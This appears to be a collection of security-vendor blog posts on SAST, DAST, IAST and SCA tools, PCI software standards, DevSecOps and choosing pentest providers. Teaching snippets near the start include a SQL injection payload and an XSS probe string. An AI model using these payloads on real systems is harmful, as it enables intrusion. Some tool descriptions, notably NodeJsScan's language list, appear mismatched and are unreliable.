Top SAST Tools for Developers

Finding coding errors early in the development life cycle saves organizations time and money and makes applications more secure. Bugs caught as code is written cost far less to fix than bugs caught after release, and the code ends up more secure from the start. One way to catch code flaws sooner is through the use of Static Application Security Testing (SAST) tools.

SAST tools offer organizations a number of benefits. They scale well, can be run on software written in a variety of languages, and can be run repeatedly, such as during overnight builds. They integrate easily into integrated development environments (IDEs) and can identify common errors such as buffer overflows, cross-site scripting (XSS) problems, and SQL injection flaws. What's more, after they find an error, they make life easier for developers by identifying the source file, line number, and even the subsection of the line containing the error.

The tools have weaknesses, too, which is why they should be used in conjunction with other error-finding solutions. SAST tools aren't adept at finding authentication problems, access control issues, configuration flaws, or weak cryptography. Some of them produce too many false positives and have difficulty analyzing code that can't be compiled, and it can be challenging to determine whether a reported issue is an actual vulnerability.

There are a number of SAST tools, both commercial and open source, available to organizations. Here are five of the most popular in each category.
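To illustrate the kind of flaw these tools flag, here is a minimal SQL injection example in Python (the table and data are hypothetical): the first function builds a query by string formatting, which a SAST tool would flag, while the second uses the parameterized form a scanner would recommend.

```python
import sqlite3

# Hypothetical in-memory database for the demonstration
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

def find_user_vulnerable(name):
    # Flagged by SAST: untrusted input concatenated into the SQL string
    query = "SELECT role FROM users WHERE name = '%s'" % name
    return conn.execute(query).fetchall()

def find_user_safe(name):
    # The fix: a parameterized query; the driver handles escaping
    return conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)
    ).fetchall()

payload = "' OR '1'='1"
print(find_user_vulnerable(payload))  # returns every row: [('admin',)]
print(find_user_safe(payload))        # returns nothing: []
```

The injected `' OR '1'='1` turns the vulnerable query's WHERE clause into a tautology, dumping the whole table, while the parameterized version treats it as an ordinary (non-matching) name.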

Commercial

Fortify Static Code Analyzer

This SAST tool made by Micro Focus can be harder than some other solutions to integrate into your software development lifecycle, although it does support IDEs, build tools, code repositories, and bug trackers. Once it's set up, though, both developers and security practitioners will like its performance. It produces understandable and traceable vulnerability information, supports 25 languages, and makes it easy to weed out false positives manually. What's more, it can provide scan information fast, eliminating the need for partial or incremental scans. On the downside, some users have complained online about difficulty troubleshooting problems with Fortify's support people and about out-of-date documentation.

Veracode

In addition to SAST, Veracode’s solution supports Dynamic Application Security Testing and Software Composition Analysis, as well as manual penetration testing. Better yet, an application’s status across all testing can be seen through a single dashboard. The app is designed for developers, and includes an API for customizing the software. When it finds a vulnerability, it provides tips for fixing it. If you’re a Jira user, Veracode will open tickets with the appropriate development teams when it finds flaws in your code, which can also be helpful in generating valuable statistical information about your applications. According to Veracode, developers working in DevSecOps environments fix errors 11 times faster with its solution than other developers. 

Coverity Scan

Coverity SAST is part of the Synopsys Software Integrity Platform portfolio, which also includes technologies acquired from Cigital, Codiscope, and Black Duck Software. The portfolio covers the gamut of testing technologies—DAST, SCA, and Interactive Application Security Testing. Synopsys released an upgrade of Coverity earlier this year with enhanced capabilities that allow the software to scan for more vulnerability types across a variety of programming languages. It can also perform static code analysis without compiling code for languages that are interpreted or whose code can be modeled fairly accurately without compilation. In addition, it can now do framework analysis and advanced JavaScript template analysis, which can spot XSS vulnerabilities in HTML dynamically generated by those templates.

Checkmarx CxSAST

CxSAST is part of Checkmarx’s Software Exposure Platform, which is designed to address software security risk throughout the software development lifecycle. It can identify hundreds of security vulnerabilities in both custom and open source components and supports more than 25 coding and scripting languages. However, some users have complained that better mobile language support is needed, especially support of Xamarin. Another user sore point is the cost of the software’s professional services. Most common plugins work well with the software and its integrations are solid, especially with build servers like Jenkins. It can also perform scans without building code.

AppScan

IBM recently sold AppScan to HCL. The software lets an organization implement a scalable security testing strategy that can pinpoint and remediate application vulnerabilities in every phase of the development lifecycle. It can test web, mobile, and open source software and provides management and reporting tools for multi-user, multi-app deployments. Deployment options are flexible and include on-premises, cloud, and hybrid offerings. Users have praised the software for its low rate of false positives and its ability to counter application attacks, as well as protect data. It has been criticized for having an “unintuitive and hulking interface” and a support library that’s vast but difficult to navigate.

 

Open Source

Brakeman

This software is a free vulnerability scanner designed for Ruby on Rails applications. It statically analyzes Rails application code to find security issues at any stage of development. Users have praised the program for the speed and accuracy of its scans and for providing remediation information that’s easy for developers to understand.

NodeJsScan

Development teams working with Node.js can use NodeJsScan to scan their code. The software has a command line interface for easy integration with DevSecOps CI/CD pipelines. It produces results in JSON and supports a number of programming languages, including Java, C++, C#, VB, PHP, and PL/SQL. A configuration file is available for each language and can be modified for customized searches. Overviews of individual files, as well as an entire codebase, can be visualized through stats and pie charts. The program can detect buffer overflows and flaws in Java code that may contain OWASP security risks.

FindBugs

This open source project sponsored by the University of Maryland is designed to catch bugs in Java code through static analysis. It has been a while since the application was updated; the latest version is 3.0.1, released in March 2015. Scans classify the bugs and vulnerabilities they find into four rankings: scariest, scary, troubling, and of concern. The program can find defects in 15 categories, but reports can be customized so only a subset of the categories is reported on. Functionality can be expanded through plug-ins. FindBugs can be a powerful tool if configured correctly. It can also be run as part of a separate continuous automatic code review tool like Sputnik, which can give FindBugs’ reports better visibility.

JsHint

Engineers at Mozilla, Wikipedia, Facebook, Twitter, Yahoo, Red Hat and other companies use JSHint to catch defects in JavaScript programs. The open source software is designed to help developers write complex programs without worrying about typos and language errors. It can scan a codebase and report on common mistakes and potential bugs, such as syntax errors, implicit type conversions, and leaking variables. The tool was created in 2011 as a fork of the JSLint project by developers who felt JSLint was getting “too opinionated” and did not allow enough customization.

CodeWarrior

This web-based tool can find security vulnerabilities in applications written in C, C#, PHP, Java, Ruby, ASP, and JavaScript and is available for Linux, macOS, and BSD. The software doesn’t have to be installed on a machine: after you download it, compiling it with “make” gets it running. And although it’s a web app, Apache isn’t needed to run it. After CodeWarrior starts, it opens your web browser and asks you to choose the source code you want scanned. The program has a reputation for producing low rates of false positives.


Open Source Security Tools to Complete Your Software Development Life Cycle

Integrating open source security tools into your SDLC

Change always has costs connected to it. Change needed when moving security “left” in your software development lifecycle is no exception. One way to curb costs when you leap into DevSecOps is to integrate open source security tools into the process.

Such tools are especially important as the software development process accelerates. That’s because the faster code is implemented, the more vulnerability issues it’s likely to have. Limiting vulnerabilities in deployed code should be the top goal of a DevSecOps program. Next in importance are teaching developers how to write secure software, providing processes and tools for application security standardization, and demonstrating software security maturity through metrics and assessment.

Even before you introduce open source tools into your pipeline, they can play a role in teaching your developers about writing secure software. For example, OWASP (Open Web Application Security Project) publishes a list of proactive controls to help developers do that. The concise list—explanations are two or three pages long—includes:

  • Define security requirements.
  • Leverage security frameworks and libraries.
  • Secure database access.
  • Encode and escape data.
  • Validate all inputs.
  • Implement digital identity.
  • Enforce access control.
  • Protect data everywhere.
  • Implement security logging and monitoring.
  • Handle all errors and exceptions.
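To make one of these controls concrete, "validate all inputs" typically means checking every field against an allow-list of expected formats before the application uses it. A minimal sketch in Python; the form fields and validation rules here are hypothetical:

```python
import re

# Hypothetical allow-list rules for a signup form
RULES = {
    "username": re.compile(r"^[a-z0-9_]{3,20}$"),
    "age": re.compile(r"^\d{1,3}$"),
}

def validate(form):
    """Return the names of fields that fail validation."""
    errors = []
    for field, pattern in RULES.items():
        value = form.get(field, "")
        if not pattern.fullmatch(value):
            errors.append(field)
    return errors

print(validate({"username": "alice_1", "age": "34"}))      # []
print(validate({"username": "<script>", "age": "forty"}))  # ['username', 'age']
```

Rejecting anything outside the allow-list, rather than trying to blacklist known-bad strings, is the approach the OWASP control recommends.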

OWASP also makes a vulnerability-riddled program called Juice Shop that gives developers hands-on experience with an insecure application. Developers can test their knowledge of the OWASP Top 10 vulnerabilities, as well as others, as they try to hack the app and rack up points.

Another free OWASP offering for developers is its collection of cheat sheets. They form a knowledge base of common security issues found in web apps and ways to mitigate them. For example, there’s a cheat sheet on password storage that explains typical errors made when storing passwords and how to use encryption and hashes to protect passwords from bad actors.

Threat modeling, which is performed during the design phase of a feature, can be used to address vulnerabilities before any code is written. OWASP makes an open source threat modeling tool called Threat Dragon that’s geared toward developers. It’s built around four essential questions: What are we building? What can go wrong? What are we going to do about that? Did we do a good enough job?

Tools in the pipeline

A number of open source tools are available to implement DevSecOps in your pipeline. Here are a few.

Static Application Security Testing (SAST)

SAST tools are used on code before you compile or run it. They analyze applications at the source code level, so they can uncover errors in written code but not in code execution. In addition to security issues, they can find problems with documentation, coding standards, and performance. Automation is a key consideration when choosing a SAST tool, because you want to continuously identify quality defects and security vulnerabilities as code is written so they can be addressed early in the SDLC.
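As a rough sketch of the idea behind source-level analysis, the toy checker below parses Python source into an abstract syntax tree and flags a single risky pattern, reporting line numbers the way real tools do. Real scanners layer data-flow and taint analysis on top of this; the `eval` rule is just an illustration:

```python
import ast

def find_eval_calls(source):
    """Toy static check: report line numbers of eval() calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id == "eval"):
            findings.append(node.lineno)
    return findings

sample = """\
x = input()
y = eval(x)  # dangerous: executes arbitrary input
z = len(x)
"""
print(find_eval_calls(sample))  # [2]
```

Because the check runs on the parse tree rather than the running program, it finds the flaw without executing (or even being able to execute) the code, which is exactly the SAST trade-off described above.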

Some open source SAST tools focus on particular coding languages. For example, reshift is a vulnerability scanner for Java and JavaScript. Brakeman is designed for Ruby on Rails and FlawFinder for C++.

Other SAST tools can scan a variety of languages. Google SearchDiggity, for instance, provides source code security analysis across a huge range of open source projects. Graudit scans multiple languages for security flaws, as does SonarQube, which provides continuous inspection of code quality and automatic reviews of code for bugs, vulnerabilities, and code smells.

Dynamic Application Security Testing (DAST)

DAST tools monitor an application while it’s running. Typically, DAST tools test only exposed HTTP and HTML interfaces for web-enabled applications. The tools are easier to use than SAST tools, but they generate less information about what they find, leaving it up to the developer to find and fix vulnerable code.
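At its core, a common DAST check is simple: send a marker payload at an exposed HTTP interface and see whether it comes back unescaped, which hints at a reflected XSS hole. A stripped-down sketch of that check in Python, operating on canned response bodies instead of a live target (the payload string is made up):

```python
# Hypothetical probe marker a scanner might inject into a form field
PAYLOAD = "<script>alert('dast-probe-7f3a')</script>"

def reflects_payload(response_body):
    """True if the probe string comes back unescaped (possible XSS)."""
    return PAYLOAD in response_body

# Simulated response bodies from a target web app
escaped = "You searched for: &lt;script&gt;alert('dast-probe-7f3a')&lt;/script&gt;"
unescaped = "You searched for: <script>alert('dast-probe-7f3a')</script>"

print(reflects_payload(escaped))    # False: the app encoded the input
print(reflects_payload(unescaped))  # True: the probe came back verbatim
```

Note what the check does and doesn't tell you: it shows the running app reflected the input, but not which line of source code failed to escape it, which is why DAST findings leave the code hunt to the developer.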

DAST apps are available in both free and open source flavors for a number of platforms and as a service. Arachni, for example, is a free Ruby framework designed for penetration testers and administrators to assess the security of their web apps. It supports the big three desktop operating systems—Windows, MacOS and Linux—while tools like AppTrana and WebCookies perform their scans from the cloud.

OWASP sponsors an open source DAST project called ZAP—Zed Attack Proxy—for Windows, Unix/Linux, and MacOS supported by hundreds of volunteers. Not only can it automatically find security vulnerabilities in web applications as they’re being developed and tested, but it’s also useful for experienced pen testers performing manual tests.

Other open source DAST offerings for Windows, Unix/Linux, and MacOS include Grendel-Scan, which also has an automated testing module, and Wapiti, which does “black box” scans of the web pages on which the target apps reside and looks for scripts and forms into which it can inject data.

In addition to scanners for web apps, there are also open source DAST tools for securing web servers. Nikto, which supports Unix/Linux, performs tests for more than 6,400 potentially dangerous files and Common Gateway Interface flaws, outdated versions of more than 1,200 servers, and version-specific problems for more than 270 servers. Wikto performs similar tests on Windows servers and adds features such as a back-end miner and tight Google integration.

Interactive Application Security Testing (IAST)

IAST is a relatively new technology for finding security flaws in apps. Like DAST tools, IAST tools analyze running applications. Unlike DAST tools, IAST tools use code instrumentation to observe application behavior and data flow so they can provide developers with the information they need to pinpoint flaws and fix them. At this time, there’s only one free—with registration—IAST tool, Contrast Community Edition. The tool for Java code can be used on one application with up to five users.

Software Composition Analysis

Software Composition Analysis tools are used to analyze open source libraries and components used by an application. Vulnerabilities in open source components can evade other kinds of testing so it’s important to include an SCA tool in the DevSecOps pipeline. OWASP makes two SCA tools: Dependency Check and Dependency Track.

Dependency Check identifies dependencies in a project and checks if there are any known, publicly disclosed vulnerabilities in them. The tool fully supports Java and .NET and experimentally supports Ruby, Node.js, and Python. There’s also limited support for C/C++ build systems.
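One common way to use Dependency Check in a pipeline is to have it emit a JSON report and gate the build on severe findings. A hedged sketch in Python: the inline sample mimics the report's `dependencies`/`vulnerabilities` shape, but the exact schema can vary by tool version, so treat the field names as assumptions:

```python
import json

# Inline sample shaped like a Dependency Check JSON report (schema assumed)
sample_report = json.loads("""
{
  "dependencies": [
    {"fileName": "commons-text-1.8.jar",
     "vulnerabilities": [{"name": "CVE-2022-42889", "severity": "CRITICAL"}]},
    {"fileName": "slf4j-api-1.7.30.jar"}
  ]
}
""")

def severe_findings(report, levels=("HIGH", "CRITICAL")):
    """Collect (file, CVE) pairs at the chosen severities."""
    hits = []
    for dep in report.get("dependencies", []):
        for vuln in dep.get("vulnerabilities", []):
            if vuln.get("severity", "").upper() in levels:
                hits.append((dep["fileName"], vuln["name"]))
    return hits

findings = severe_findings(sample_report)
print(findings)  # [('commons-text-1.8.jar', 'CVE-2022-42889')]
```

A CI step could fail the build whenever `severe_findings` returns a non-empty list, which is the short feedback loop the pipeline advice below calls for.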

Dependency Track keeps tabs on all third-party components in all applications created or consumed by an organization. It’s integrated with an assortment of vulnerability databases, including the National Vulnerability Database (NVD), NPM Public Advisories, Sonatype OSS Index, and VulnDB from Risk Based Security.

When incorporating open source security tools into your DevSecOps pipeline, you’ll want to automate as many of the security tests as possible. The tests should be automated at every major commit of code by development or operations, even at the very early stages of a project. The idea is to create short feedback loops so the DevOps teams are notified of potential security problems within short time frames. That way, the teams can mitigate the problems as part of their daily workflow, while they’re digestible, and not at the end of the software development lifecycle, when fixes can become complex, time-consuming, and expensive.

New PCI Framework Boosts DevSecOps


Earlier this year, the PCI Security Standards Council released the first major revamp of its software standards in over a decade.

The new standards were crafted to better evaluate the security of payment ecosystems. They’re meant to square existing standards with modern software production, which embraces DevOps, Agile, and continuous integration and delivery.

They may also spark interest in embedding security earlier in the software development life-cycle.

With the new standards, the PCI council hopes to reduce credit card fraud, which continues to plague the industry despite the move to EMV technology. The chip-on-a-card tech was supposed to thwart fraudsters.


That doesn’t seem to be the case, however. A report by Gemini Advisory released in May noted that 60 million U.S. payment cards were compromised during the previous 12 months. Of that number, 75 percent (45.8 million) were compromised at a point-of-sale device, with the remainder compromised in an online breach.

Surprisingly, of the card-present cards compromised, 90 percent had EMV chips.

Secure Software Standard 2019

The new standards—the Secure Software Standard and Secure Software Lifecycle Standard—are part of the PCI Software Security Framework. The framework is a collection of software security standards and associated validation and listing programs for the secure design, development, and maintenance of modern payment software.

“Software development practices have evolved over time, and the new standards address these changes with an alternative approach for assessing software security,” PCI SSC Chief Technology Officer Troy Leach explained in a blog.

“The PCI Software Security Framework introduces objective-focused security practices that can support both existing ways to demonstrate good application security and a variety of newer payment platforms and development practices,” he added.

PCI has designed the Secure Software Standard (S3) to protect the integrity and confidentiality of payment transactions and data through new security requirements and assessment procedures. The S3 addresses issues such as critical asset identification, secure default configuration, sensitive data protection, authentication and access control, attack detection, and vendor security guidance.

Replacing PA-DSS

The S3 is expected to eventually replace the existing Payment Application Data Security Standard. The PA-DSS focuses on software development and lifecycle management principles for security in traditional payment software to help merchants maintain PCI-DSS compliance. The S3 goes beyond that. It addresses overall software security resiliency.

“The PA-DSS is applicable to direct payment applications only—apps that directly process credit cards. The new standards apply to all application development in the PCI DSS space,” Matthew Getzelman, a principal consultant at Synopsys, explained in a company blog.

Both standards are similar in one respect, however. Their goal is to establish a way to demonstrate how software protects the payment data that it stores, processes, or transmits and give software providers a method for performing independent security evaluations of their software.

A gradual transition from the PA-DSS to the S3 is envisioned by the PCI council. Organizations that have invested in the PA-DSS can continue to use applications validated under that process until 2022, when validation on those apps runs out. After that, those applications will be moved to an “acceptable for pre-existing deployments” list, and any upgrades to those apps will have to be assessed under the new Software Security Framework.

The S3 is aimed at payment software that is sold, distributed, or licensed to third parties to support or facilitate payment transactions. However, the council is encouraging large organizations to apply the standards to their in-house payment apps, too.

Secure Life-Cycle Management 2019

The new PCI framework also includes the Secure Software Lifecycle Standard. It could help expand the movement toward embedding security earlier in the application development life-cycle.

“I was particularly pleased to see the emphasis on integrating security into the software development process rather than attempting to assure security by after-the-fact testing,” Steve Lipner, executive director of the Software Assurance Forum for Excellence in Code and a participant in the PCI Software Security Task Force, said in a statement.

Modern software development, which incorporates Agile, DevOps, and continuous integration and delivery, has increased the difficulty of maintaining good application security as changes are introduced. The new life-cycle standards address that challenge by outlining security requirements and assessment procedures by which software vendors can validate their security efforts throughout the application life-cycle.

Among the principles addressed by the standards are governance, threat identification, vulnerability detection and mitigation, security testing, change management, secure software updates, and stakeholder communications.

The standards can be used by makers of software for the payments industry to demonstrate they have mature secure application life-cycle management practices in place to ensure their apps are designed and developed to protect payment transactions and data, minimize vulnerabilities, and defend against attacks.  

“This provides confidence to businesses using the payment application that their software vendor is providing ongoing assurance to the integrity of the software development and confidentiality of payment data as change occurs,” PCI’s Leach explained.

Flexible Testing

More integration of security into the software lifecycle will also be encouraged by more flexible testing standards than in the past. PA-DSS, for example, is overly prescriptive.

“It said you had to do A, B, and C, and it just didn’t work for a lot of different kinds of software,” Jeff Williams, co-founder and CTO of Contrast Security and a participant in the expert council that contributed to the new standard, told Dark Reading.

“So when you’re looking at DevOps projects that are releasing seven times a day and moving super fast and using tons of libraries, and building APIs, and deploying in the cloud, that old standard just didn’t work well,” he added.

Testing is no longer limited to penetration testing and application security testing. To meet the new standards, a combination of static and dynamic tools must be used to validate each code objective. They include static application security testing (SAST), dynamic application security testing (DAST), interactive application security testing (IAST), and software composition analysis (SCA) tools, as well as manual techniques such as code reviews and penetration testing.

The new PCI Security Framework has been described as “transformational” by some experts. But Sammy Migues, chief scientist at Synopsys, who served on a working group that developed the standards, had a word of warning for enthusiasts of the new rules. The “intent and philosophy” are transformational, he told Forbes, but it will take some time to see if the reality matches the intent.


Watch Out for Hidden Costs of Security Tools for Developers


As security “shifts left” in the application development lifecycle, developers will be called on to work with tools to reduce flaws in their code that could make their programs vulnerable to attack by threat actors. Those tools, though, can come with costs that aren’t immediately apparent.

For example, detection-based tools can distract developers from their primary tasks and lead to costly losses in productivity and increases in overhead expenses.

On the balance sheet, these tools can appear as advanced threat detection applications, detonation environments, antivirus programs, and whitelisting and blacklisting software. For a 2,000-person organization, those tools could cost an average of $345,000 a year, according to a recent study conducted by Vanson Bourne for Bromium.

But the costs don’t stop there. There are human capital costs.


Human Capital Costs

Depending on how finely an organization tunes the sensitivity of such tools, they can create an avalanche of alerts—as many as a million a year—for a security team or developers to triage. What’s worse, most of those alerts—75 percent by some estimates—are false positives.

Those hours spent chasing alerts, triaging threats, rebuilding compromised machines, and issuing emergency patches can cost an organization more than $16 million a year.

Static Code Analysis Tools

Static code analysis tools can also contain hidden costs.

Static code analysis tools that identify security flaws can perform automated scans throughout the development life-cycle. However, some of these tools can slow down the process and delay application delivery.

It’s also important to be aware of the limitations of SAST tools. A study by the National Institute of Standards and Technology’s SAMATE project found that static tools were able to find “simple” bugs in code but failed to find vulnerabilities that require a deep understanding of the code or its design.

For example, when a SAST tool was used to scan the popular open source software Tomcat, warnings were generated for only four of 26 Common Vulnerabilities and Exposures (CVE) entries. In other words, if an organization produced an application like Tomcat and depended on a SAST tool as its primary application security tool, its software would be delivered with 22 of the 26 vulnerabilities intact.


Static tools can also be challenged by dynamically typed languages, like JavaScript and Python. Inspecting objects in those languages at compile time won’t reveal their class or type, which hinders a tool’s ability to find certain security flaws in the code. According to noted software security author Gary McGraw, code flaws that SAST doesn’t handle reliably include:

  • Storage and transmission of confidential data, especially when the data isn’t programmatically discernable from non-confidential data;
  • Authentication, such as susceptibility to brute force attack or effectiveness of a password reset;
  • Entropy for randomization of non-standard data;
  • Privilege escalation and insufficient authorization; and
  • Data privacy, such as data retention and masking credit card numbers when they’re displayed.
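The dynamic-typing limitation mentioned above is easy to see in Python: which class an object belongs to is often decided only at runtime, so a static tool can't always tell whether a given call is the safe one. A contrived sketch (both renderer classes are hypothetical):

```python
import random

class SafeRenderer:
    def render(self, text):
        # Escapes input before output
        return text.replace("<", "&lt;").replace(">", "&gt;")

class RawRenderer:
    def render(self, text):
        # Emits input verbatim: an XSS risk with untrusted text
        return text

def pick_renderer():
    # The concrete class is chosen at runtime; a static analyzer
    # inspecting this source cannot know which render() gets called.
    return random.choice([SafeRenderer, RawRenderer])()

output = pick_renderer().render("<b>hi</b>")
print(output)  # either escaped or raw, unknowable statically
```

In a statically typed language, the declared type of the renderer would tell the analyzer which `render` is reachable; here, the information simply doesn't exist before the program runs.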

SAST tools on the market today often burden users with these gaps. We built our automated tool, reshift, to mitigate these hidden costs.

Open Source Problems


Tools and agility alone, though, don’t make DevOps and DevSecOps work, Sami Laine, principal technologist at CloudPassage, has noted. “It’s those things, plus a culture of respect and culture of collaboration,” he said.

Open source tools have steadily gained popularity among security practitioners for a number of reasons. They can be customized to fit an organization’s needs. They offer a way to avoid software licensing or subscription headaches, as well as vendor lock-in. And because they’re distributed without charge, they sometimes can save a business money.

There are also hidden costs connected to these tools.

Learning Curve:

Open source software doesn’t always have intuitive interfaces, so it can be difficult to learn. That means training may be necessary, and reduced productivity can be expected as users advance up the learning curve.

That’s especially true when developers are asked to perform security tasks earlier in the application development lifecycle. Many developers have limited experience writing secure code. In addition, creating consistent, repeatable processes that enable developers with a variety of skill sets to find and fix security flaws can be challenging.

If the interface for the tool has to be redesigned, that’s another expense that has to be taken into account.

Installation:

The tools can also be challenging to install. If an organization has a strong IT department, that might not be a problem. If it doesn’t, outside help may be necessary. That kind of help can be expensive.

Even with a strong IT presence, open source tools can require large time commitments from an enterprise.

Customization:

The same is true for customization. If an organization has the IT chops to fiddle with an application, an open source tool may be able to meet its needs. If not, it may find itself buying add-ons to get a job done or worse, upgrading to a “premium” version of the tool, which comes with much of the baggage—and expense—of a commercial solution.

Support:

Support, too, can be a problem. Unlike commercial software, help isn’t a phone call away. If something doesn’t work or breaks and a shop doesn’t have an IT department or in-house tech guru, more expenses will be incurred.

Granted, the idea behind open source software is that its community provides the support that in the commercial world is found on a help line. Not all open source projects have large communities, though. Even for those that do, finding information can be challenging. It may require combing through thousands of forum postings written over years.

What’s more, the quality of the postings can vary. They are written by people with a variety of experience and knowledge of a tool. Some may even know less about an application than the person seeking information about it.

Remember, too, that the costs of an open source solution are ongoing. Resources have to be continually dedicated to updates, patches, maintenance and training existing and new users. Failure to do so can have disastrous consequences, as Equifax found out when it failed to keep its Apache Struts web framework up to date.

As organizations try to get greater developer participation in securing their applications, they’ll need to provide those developers with tools that are intuitive to use or better yet, integrated into the life-cycle process itself where a minimum of human intervention is necessary. That way many of the hidden costs associated with existing tools can be avoided.


3 Things to Watch Out For While Integrating Security into DevOps


Security should not be an afterthought to DevOps

DevOps has revolutionized how new applications are brought online, but it is also challenging how security teams do their jobs. 

In theory, DevOps can make applications more secure by baking security into the Software Development Lifecycle from the earliest stages of that cycle. Right now, though, that’s not the case.

"While automation and team integration could lead to greater adoption of application security in the future, the current state is that most organizations are not implementing security within their DevOps programs."

- Report by Hewlett Packard Enterprise on application security and DevOps

“In mature security organizations, where application security is already an integral part of development, it continues to be prioritized as a critical DevOps component,” the report continued. “If a secure SDLC was not a disciplined practice before, it is often left behind in the rush to DevOps.”

Adjusting to Speed

One aspect of DevOps security teams must adjust to is speed. Eighteen-month development cycles are being reduced to six weeks or less, which severely cuts the time the team has for due diligence. Read more on integrating security in the SDLC.

Moreover, coding is being done by multiple teams. DevOps teams tend to be smaller and there are more of them, so not only is code being produced more rapidly, but more infrastructure is changing more rapidly, too, through automation and agile tools. “This breaks the traditional security approach in a pretty profound way,” Sami Laine, principal technologist at CloudPassage, said at a recent webinar.

It also requires that security tools be automated and orchestrated to match the speed at which the developers are working. Without a fully automated tool chain, security can bog down the DevOps process by hours or days. “This is fundamentally breaking the spirit and flow of the way DevOps should work,” Laine noted.

This led us to build a security DevOps tool that integrates into the developer pipeline and operates at the speed of DevOps.

If an organization’s security tools are friendly to DevOps, most security tasks will be performed automatically in the same pipeline as the one used for producing the app. Only security issues that require human intervention will be flagged for developer action.

Instead of security erecting gates that code has to pass through before entering production, Laine explained, it needs to erect guardrails that allow developers to make mistakes but prevent them from creating disasters.

Tools and agility alone, though, don’t make DevOps and DevSecOps work, Laine noted. “It’s those things, plus a culture of respect and culture of collaboration,” he said.

Security's Changing Role

Tension between security teams and developers has always been a problem due to conflicting goals. Developers want their software out of the pipeline as fast as possible. Security teams stand in the way of that with their testing and demands that developers go back to the drawing board to fix flaws. Read more on integrating security with agile.

There’s no room for that kind of tension in a DevOps environment. To reduce it, security teams need to alter their roles in the process.

Adrian Sanabria, a senior analyst with The 451 Group who also participated in the webinar, sees security becoming a consulting organization within the enterprise. That shift will benefit security because it means security will be working more closely with developers. “We’re going to understand the constraints that they have,” Sanabria said. “We’re going to throw less things over the wall that shouldn’t be fixed or can’t be fixed easily because we understand the environment better.”

With the proper security automation tools in place, human intervention into DevOps can be kept to a minimum. “If there are any problems, they’re sent back to the developer,” Sanabria explained. “Security doesn’t even need to be involved in that transaction.”

Security involvement may be necessary if the developer has a question about the problem. Then security, wearing its consultant’s hat, can explain the severity of the problem: for example, that if the flaw isn’t fixed, the app will be compromised within 10 seconds of going live.




New Skills

Security pros will also need new skills to better secure apps in a DevOps environment. Those include the ability to write code and scripts, as well as working with APIs. Those skills will be necessary for automating traditional security tasks and “baking” them into the development process. “No longer is it a question of baked-in versus bolted in,” Sanabria said. “It’s just a question of how are you going to bake it in?”

Traditional security practitioners will remain relevant, he noted, although demand for infosec pros who have new skills is growing rapidly. He noted that in an informal survey of job listings he conducted, about 60 percent of them were looking for candidates with new skills.

DevOps is causing a change in security culture, Sanabria maintained. “In a lot of environments, people have described it to me as pulling off a Band-Aid,” he said. “Some people were able to make the shift, other people they had to either find different things for them to do or lay them off.”

“Talent acquisition becomes a really tough problem in this new environment,” he observed.

“In fact,” he added, “in some organizations, I’m seeing companies hiring developers and teaching them security because they find that easier than to take traditional security people with experience and to try to pull them over into this new world of new IT.”

Change our mind


The keys to application security lie within DevOps.

Do you agree? Drop us a comment and let us know what you think. 


3 Considerations Before Deciding to Switch Pentest Providers

The History of Pentest Providers

You have done one or more pentests, whether for PCI compliance purposes, for internal policy requirements, or because your clients require it. Now it is time to perform another one, and the question that always seems to arise is: should you change your pentest provider? One common opinion is to change vendors every 2–3 years, the belief being that a new vendor brings a fresh perspective and hence finds new bugs.

This advice seems to date back to the 2000s, when application security was still new and penetration testing providers had no trouble identifying a fair number of issues per test. At that time, security controls were largely non-existent, and perimeter security ruled as the method of choice for protecting everything from the network to applications and everything in between. Another source of this advice is a SANS whitepaper from 2010 that outlined changing vendors as good practice.

Applications have changed quite a bit since the 2000s: they are more complex, use modern languages, and ship with native framework protections, and a multitude of other factors suggest this advice might be obsolete. While there are legitimate reasons for changing your application security vendor, there are a few things to keep in mind:


Here are the top reasons for switching vendors:

1. Complacency

Application security engineers, just like developers, can be blind to some aspects of their own work. For software developers, it can be very hard to find their own bugs; hence the practice of peer code review and the slew of quality assurance controls put in place, such as unit tests and manual and automated quality assurance testing.

Application security engineers face the same problem: they can be blind to the bugs in an application that they didn’t find the first time.

One of the questions you need to ask your pentest vendor is what they do to overcome this problem.

2. Quality and Value Intelligence

It might be worth considering other vendors to understand what service you are getting at what price point. Additionally, not all penetration testing providers are created equal: one vendor could be really good at identifying vulnerabilities but weak on post-report support, while another excels at the services provided after the report is delivered.

3. Leveraging Different Expertise

It might be worth exploring different vendors for different areas of expertise. For example, one vendor could be very strong at performing a pentest but weaker at social engineering, so you can leverage different vendors for their different strengths.

Here are the top considerations before deciding to switch vendors:

1. Losing Context and Application Knowledge: There are typically three levels of depth to any pentest:

Level 1: The low-hanging fruit: basically what any scanner can find.

Level 2: The medium-range issues: bugs that scanners can’t find but an engineer can. They are still easy to find; it just takes someone looking for them with an agile enough approach.

Level 3: The difficult bugs: these are only found when the engineer gets intimate enough with the application to understand exactly how it works.

For a 2–3 week penetration test, it is very hard for a new vendor to reach Level 3 in such a short amount of time. Depending on the nature of your application, there might not be a lot of business logic, and hence no need for Level 3. Another thing to consider is who your primary threat actors are: are you up mostly against script kiddies, or against professional hackers and cyber gangs?

2. Losing the Partner Relationship:

It takes time for a pentest provider to understand your business, your application, and the dynamics of your team. Working with a pentest provider should not stop at the delivery of the report. A good pentest provider should be able to identify really good bugs and, more importantly, help you mitigate those bugs and further fortify the application. If you are not getting that help from your current vendor, it might be worth having a conversation with that vendor or searching for a new one.

3. Losing Motivation:

For most companies in the professional services space, it is (or at least it should be) a top priority to go the extra mile to keep their clients. Knowing from the get-go that it is a temporary relationship might not motivate a vendor to go above and beyond for you. Don’t get me wrong: I don’t mean the vendor will offer degraded or below-normal service. It means not going the extra mile for a client who is guaranteed not to come back.

There are several factors that go into choosing a pentest partner: skills, history, price, and processes among others. Building a solid relationship with them and getting the most value requires communication, trust and transparency.

What do you believe is best practice?


Secure Code Review Checklist [Downloadable]

Secure Code Review

The team at Software Secured takes pride in its secure code review abilities. We perform secure code review activities internally on our own applications, as well as on client secure code reviews and hybrid assessments. We do a lot more of the latter; hybrid assessments consist of network and web application testing plus secure code review.

